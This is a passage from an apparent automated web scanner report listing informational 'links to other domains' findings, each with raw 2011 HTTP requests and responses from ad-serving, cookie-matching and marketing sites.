User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:20:14 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Fri, 01 Apr 2011 14:32:11 GMT
Date: Sun, 24 Apr 2011 15:19:34 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1238

<IFRAME SRC="http://ad.doubleclick.net/adi/N553.158901.DATAXU/B5114832.6;sz=728x90;pc=[TPAS_ID];ord=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N553.158901.DATAXU/B5114832.6;abr=!ie;sz=728x90;pc=[TPAS_ID];ord=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/jump/N553.158901.DATAXU/B5114832.6;abr=!ie4;abr=!ie5;sz=728x90;pc=[TPAS_ID];ord=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy?">
<IMG SRC="http://ad.doubleclick.net/ad/N553.158901.DATAXU/B5114832.6;abr=!ie4;abr=!ie5;sz=728x90;pc=[TPAS_ID];ord=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

23.108. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rl7Vm3VTU_682412618.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /i/0Rl7Vm3VTU_682412618.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=753&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679995&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661995029&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661995034&frm=1&adk=2614322350&ga_vid=1092593501.1303661995&ga_sid=1303661995&ga_hid=294155726&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:13:06 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:19:53 GMT
Cache-Control: no-cache, no-store
content-type: text/html
P3P: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 19 Apr 2011 21:53:32 GMT
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 409
pragma: no-cache
Via: 1.1 mdw061001 (MII-APC/1.6)
Content-Length: 2174

<IFRAME SRC="http://ad.doubleclick.net/adi/N4860.158901.DATAXU/B5300325.14;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4860.158901.DATAXU/B5300325.14;abr=!ie;sz=160x600;click=http://i.w55c.net/cl?&t=1&ei=GOOGLE_CONTENTNETWORK&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&reqid=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjY&slotid=MQ&fiu=MEZXTmpRSzNBVA&ciu=MFJsN1ZtM1ZUVQ&epid=&refurl=&s=http://pub.retailer-amazon.net/banner_120_600_b.php&wp_exchange=TbRNqAABcpYK5X5iGNAFJh24yaOdrpmneXfYCA&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&rurl=;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/jump/N4860.158901.DATAXU/B5300325.14;abr=!ie4;abr=!ie5;sz=160x600;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw?">
<IMG SRC="http://ad.doubleclick.net/ad/N4860.158901.DATAXU/B5300325.14;abr=!ie4;abr=!ie5;sz=160x600;ord=NERCNDREQTgwMDAxNzI5NjBBRTU3RTYyMThEMDA1MjZ8R0ZQOWdsRlJLUnwxMzAzNjYxOTk0MTYzfDF8MEZXTmpRSzNBVHwwUmw3Vm0zVlRVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDc1MzM3Nw?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>
...[SNIP]...

23.109. http://cdn.w55c.net/i/0RphY9og2j_721933665.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RphY9og2j_721933665.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /i/0RphY9og2j_721933665.html?rtbhost=rts-rr16.sldc.dataxu.net&btid=NERCNDNGQjEwMDAxRUMzMjBBRTUwM0QwMURERTA2NzN8R0ZoUUl3d1VBb3wxMzAzNjU4NDE5MTYzfDF8MEZ3bmdyZnBiQXwwUnBoWTlvZzJqfEVYXzEwMjM0NzcyMDZ8MTUxMDY1&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_sQAB7DIK5QPQHd4Gc3u4xT_O8KcCluKhzg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZ3bmdyZnBiQQ&ciu=MFJwaFk5b2cyag&reqid=NERCNDNGQjEwMDAxRUMzMjBBRTUwM0QwMURERTA2NzM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=151&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676420&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658420103&bpp=6&shv=r20110420&jsv=r20110415&correlator=1303658420112&frm=1&adk=513358139&ga_vid=35710902.1303658420&ga_sid=1303658420&ga_hid=969894465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:20:33 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Wed, 30 Mar 2011 19:16:28 GMT
Date: Sun, 24 Apr 2011 15:19:52 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 419

<iframe src="http://altfarm.mediaplex.com/ad/fm/3992-125865-29115-2?mpt=[CACHEBUSTER]&mpvc=" width=728 height=90 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no bordercolor="#000000"> <a href="http://altfarm.mediaplex.com/ad/ck/3992-125865-29115-2?mpt=[CACHEBUSTER]">
<img src="http://altfarm.mediaplex.com/ad/!bn/3992-125865-29115-2?mpt=[CACHEBUSTER]"
alt="Click Here" border="0">
</a>
...[SNIP]...

23.110. http://clickserve.us2.dartsearch.net/link/click  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clickserve.us2.dartsearch.net
Path:   /link/click

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /link/click?lid=43000000120467130&ds_s_kwgid=58000000001508825&ds_e_adid=8245716046&ds_e_matchtype=search&ds_url_v=2&gclid=CNf214_1tagCFeM85Qod4FaqEA HTTP/1.1
Host: clickserve.us2.dartsearch.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Location: http://ad.doubleclick.net/clk;225724241;49552626;h;u=ds&sv1=120467130&sv2=2011042472&sv3=266471;%3fhttp://equifax.com/free30daytrial/?CMP=KNC-Google&HBX_PK=credit_monitoring_service&HBX_OU=50&gclid=CNf214_1tagCFeM85Qod4FaqEA
Content-Type: text/html; charset=UTF-8
Date: Sun, 24 Apr 2011 19:52:43 GMT
Expires: Sun, 24 Apr 2011 19:52:43 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 430

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="http://ad.doubleclick.net/clk;225724241;49552626;h;u=ds&amp;sv1=120467130&amp;sv2=2011042472&amp;sv3=266471;%3fhttp://equifax.com/free30daytrial/?CMP=KNC-Google&amp;HBX_PK=credit_monitoring_service&amp;HBX_OU=50&amp;gclid=CNf214_1tagCFeM85Qod4FaqEA">here</A>
...[SNIP]...

23.111. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=netseer1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 302 Found
Location: http://cmi.netseer.com/match?ex=10&id=CAESELOuaNIo-ALjWWVJnFruZF0&cver=1
Cache-Control: Cache-Control: no-store, no-cache
Pragma: Pragma: no-cache
Date: Sun, 24 Apr 2011 03:09:56 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 277
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://cmi.netseer.com/match?ex=10&amp;id=CAESELOuaNIo-ALjWWVJnFruZF0&amp;cver=1">here</A>
...[SNIP]...

23.112. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=TheTradeDesk HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://insight.adsrvr.org/track/conv?pid=2ktjv7m&fmt=1&ct=0:RMLanding&v=1&vf=USD&adv=v1oo6vo&coid=3zvxjhl
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Found
Location: http://data.adsrvr.org/map/cookie/google?g_uuid=CAESEA3NkbgBJciWS7F8ZrJI0tc&cver=1
Cache-Control: Cache-Control: no-store, no-cache
Pragma: Pragma: no-cache
Date: Mon, 25 Apr 2011 00:32:53 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://data.adsrvr.org/map/cookie/google?g_uuid=CAESEA3NkbgBJciWS7F8ZrJI0tc&amp;cver=1">here</A>
...[SNIP]...

23.113. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=themig HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/RTB/11377797616@x24?USNetwork/PizzaHut_2H_201008_ZT_18-49_All
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 302 Found
Location: http://matcher.bidder7.mookie1.com/google?id=CAESEEkl9lk5w80cMoOGmB9XYWY&cver=1
Cache-Control: Cache-Control: no-store, no-cache
Pragma: Pragma: no-cache
Date: Sun, 24 Apr 2011 15:20:45 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 280
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://matcher.bidder7.mookie1.com/google?id=CAESEEkl9lk5w80cMoOGmB9XYWY&amp;cver=1">here</A>
...[SNIP]...

23.114. http://controlcase.com/contact.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://controlcase.com
Path:   /contact.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /contact.php?subject=Demo%20Request HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=f4764231133ed3c705cc7d27a7b0b2ed; _pk_id.3.4216=e72cf29c5d1c4bcd.1303664485.1.1303664748.1303664485; _pk_ses.3.4216=*; __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.17.10.1303664485

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:05:27 GMT
Server: Apache/2.0.55 (Win32)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 22197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<li><a href="http://archive.constantcontact.com/fs048/1101861437637/archive/1102252561213.html" title="Newsletters" target="_BLANK">Newsletters</a>
...[SNIP]...
<br />
<a href="http://www.twitter.com/ControlCase"><img src="http://twitter-badges.s3.amazonaws.com/follow_us-c.png" alt="Follow ControlCase on Twitter"/></a>
...[SNIP]...

23.115. http://converseon.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://converseon.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?utm_source=google&utm_medium=ppc&utm_campaign=listening&gclid=CMmbouS1tqgCFYNo5Qod7FADDw HTTP/1.1
Host: converseon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:35:18 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: SESSe1469ec4406ba2c67f2d48b94de6dc4e=fe692229cb21ffdc9f63abb9ca71ad57; expires=Wed, 18-May-2011 04:08:38 GMT; path=/; domain=.converseon.com
Last-Modified: Mon, 25 Apr 2011 00:33:52 GMT
ETag: "a57163b63c08ab6da26b1a84650430c1"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 14576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<li>
                   <a href="http://twitter.com/converseon" target="_blank">Twitter</a></li>
<li>
                   <a href="http://www.youtube.com/converseon" target="_blank">YouTube</a>
...[SNIP]...

23.116. http://converseon.com/us/dev/sites/all/themes/converseon/css/page-front.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://converseon.com
Path:   /us/dev/sites/all/themes/converseon/css/page-front.css

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /us/dev/sites/all/themes/converseon/css/page-front.css?j HTTP/1.1
Host: converseon.com
Proxy-Connection: keep-alive
Referer: http://converseon.com/?utm_source=google&utm_medium=ppc&utm_campaign=listening&gclid=CMmbouS1tqgCFYNo5Qod7FADDw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe1469ec4406ba2c67f2d48b94de6dc4e=ef86deaf7e68aec8b5f3bbd5d34b0a01

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 00:41:41 GMT
Server: Apache
WWW-Authenticate: Basic realm="Dev"
X-Powered-By: PHP/5.3.3
Last-Modified: Thu, 21 Apr 2011 02:36:33 GMT
ETag: "ff0a4631755bd9985b669eb5a1282cc4"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 14522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<li>
                   <a href="http://twitter.com/converseon" target="_blank">Twitter</a></li>
<li>
                   <a href="http://www.youtube.com/converseon" target="_blank">YouTube</a>
...[SNIP]...

23.117. http://d.w55c.net/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.w55c.net
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /afr.php?zoneid=750&cb=NERCNDUwMzYwMDA1QTEzQTBBRUM1NzEwQTVCQjAzMDZ8R0ZFcnBoektNWXwxMzAzNjYyNjQ4NDE3fDF8MEZjSUxxQkZUb3wwUlcyMXAyZnFVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDI1MjE4NQ HTTP/1.1
Host: d.w55c.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0RW21p2fqU_270915107.html?rtbhost=rts-rr17.sldc.dataxu.net&btid=NERCNDUwMzYwMDA1QTEzQTBBRUM1NzEwQTVCQjAzMDZ8R0ZFcnBoektNWXwxMzAzNjYyNjQ4NDE3fDF8MEZjSUxxQkZUb3wwUlcyMXAyZnFVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDI1MjE4NQ&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRQNgAFoToK7FcQpbsDBuQ7j9zay5ySEgzsXw&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZjSUxxQkZUbw&ciu=MFJXMjFwMmZxVQ&reqid=NERCNDUwMzYwMDA1QTEzQTBBRUM1NzEwQTVCQjAzMDY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=252&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
